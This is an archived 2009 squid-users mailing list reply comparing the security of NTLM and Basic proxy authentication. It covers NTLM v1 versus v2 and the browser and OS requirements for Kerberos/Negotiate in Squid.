Re: [squid-users] Security of NTLM authentication

From: Guido Serassio <guido.serassio_at_acmeconsulting.it>
Date: Wed, 03 Jun 2009 14:54:43 +0200

Hi,

At 01.59 03/06/2009, Amos Jeffries wrote:
>On Tue, 02 Jun 2009 19:44:03 -0300, Leonardo Rodrigues
><leolistas_at_solutti.com.br> wrote:
> > Hello Guys,
> >
> > a simple question ..... i know that basic authentication schemas
> > transmit username/password in cleartext over the wire. It' base64
> > encoded, but it's trivially detected and decoded, which make them not
> > the most secure ones to use.
> >
> > do NTLM authentication schemas are more secure than basic ones, i
> > mean, do NTLM authentication schema transmit cleartext (or simply
> > encoded) username/passwords over the wire ?
>
>NTLM uses a side channel directly between the domain control server and the
>machine needing to check auth. I'm not sure how that is coded. The HTTP
>side of the triangle includes a hash of the credentials.
>
>One thing to be wary of is that NTLM hash strength is pretty much limited
>by the Windows releases involved. The older versions used by Win9x are
>hashes which are now trivially broken, none are completely secure. The
>latest windows releases have deprecated it in favor of the much more secure
>Kerberos (but that won't work with anything much older than XP and IE6).

Just some more explanation here:

There are two flavors of NTLM: V1 (the windows 9x version) and V2.
Squid is able to use both, but V2 is more secure.

On the Kerberos side, you need the "negotiate" authentication schema,
but there are some requirements to meet
Browser:
- Internet Explorer 7.0 or later
- Firefox 1.5 or later
OS:
- Windows 2000 or later

So on Windows 2000 you can use Negotiate with Firefox only, while on
XP/2003 you need to Install at least IE7 or Firefox.

Regards

Guido

-
========================================================
Guido Serassio
Acme Consulting S.r.l. - Microsoft Certified Partner
Via Lucia Savarino, 1 10098 - Rivoli (TO) - ITALY
Tel. : +39.011.9530135 Fax. : +39.011.9781115
Email: guido.serassio_at_acmeconsulting.it
WWW: http://www.acmeconsulting.it/
Received on Wed Jun 03 2009 - 12:55:07 MDT

This archive was generated by hypermail 2.2.0 : Wed Jun 03 2009 - 12:00:02 MDT